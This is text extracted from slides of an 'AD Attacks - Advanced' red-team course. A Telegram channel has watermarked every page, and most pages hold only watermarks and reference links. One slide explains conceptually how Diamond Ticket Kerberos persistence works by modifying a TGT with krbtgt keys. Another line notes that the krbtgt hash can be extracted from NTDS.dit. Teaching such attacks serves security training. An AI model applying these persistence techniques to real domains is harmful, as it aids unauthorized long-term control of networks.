https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 169


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 170

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 170


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://www.coresecurity.com/blog/kerberos-delegation-spns-and-more

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 185


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 191


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 192


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 193


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 194


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 195


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 196


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 197

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 197


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 199


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://www.blackhat.com/docs/us-14/materials/us-14-Duckwall-Abusing-Microsoft-
Kerberos-Sorry-You-Guys-Don%27t-Get-It.pdf
http://passing-the-hash.blogspot.com/2014/09/pac-validation-20-minute-rule-
and.html

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 200


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Krbtgt hash could also be extracted from NTDS.dit

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 201


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 202


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 203


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 204


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 205


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 206


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

List of SPNs: https://adsecurity.org/?page_id=183

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 208


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 209


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 210


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 213


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Domain Persistence - Diamond Ticket


• A diamond ticket is created by decrypting a valid TGT, making changes to
it and re-encrypt it using the AES keys of the krbtgt account.
• Golden ticket was a TGT forging attacks whereas diamond ticket is a TGT
modification attack.
• Once again, the persistence lifetime depends on krbtgt account.
• A diamond ticket is more opsec safe as it has:
– Valid ticket times because a TGT issued by the DC is modified
– In golden ticket, there is no corresponding TGT request for
TGS/Service ticket requests as the TGT is forged.

INE | AlteredSecurity AD Attacks - Advanced © 2023 Altered Security. 214

https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/
https://www.trustedsec.com/blog/a-diamond-in-the-ruff/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 214


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://www.semperis.com/blog/a-diamond-ticket-in-the-ruff/
https://www.trustedsec.com/blog/a-diamond-in-the-ruff/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 215


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

http://www.secureworks.com/cyber-threat-intelligence/threats/skeleton-key-
malware-analysis/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://adsecurity.org/?p=1785
https://adsecurity.org/?p=1714

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://msdn.microsoft.com/en-
us/library/windows/desktop/aa380502(v=vs.85).aspx
https://attack.mitre.org/wiki/Technique/T1101

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://docs.microsoft.com/en-us/previous-versions/technet-
magazine/ee361593(v=msdn.10)
https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/plan/security-best-
practices/appendix-c--protected-accounts-and-groups-in-active-directory
https://adsecurity.org/?p=1906

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://www.ossir.org/paris/supports/2017/2017-04-11/2017-04-
11_Active_directory_v2.5.pdf

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

Ref for PowerView command: http://www.harmj0y.net/blog/redteaming/abusing-


active-directory-permissions-with-powerview/

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

https://gallery.technet.microsoft.com/Invoke-SDPropagator-to-c99ae41c

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

All rights reserved to CyberBankSa Initiative --> https://t.me/CyberBankSa 242


https://t.me/CyberBankSa >-- ‫ﺟﻤﻴﻊ اﻟﺤﻘﻮق ﻣﺤﻔﻮﻇﺔ ﻟﻤﺒﺎدرة اﻟﺒﻨﻚ اﻟﺴﻴﺒﺮاﻧﻲ‬

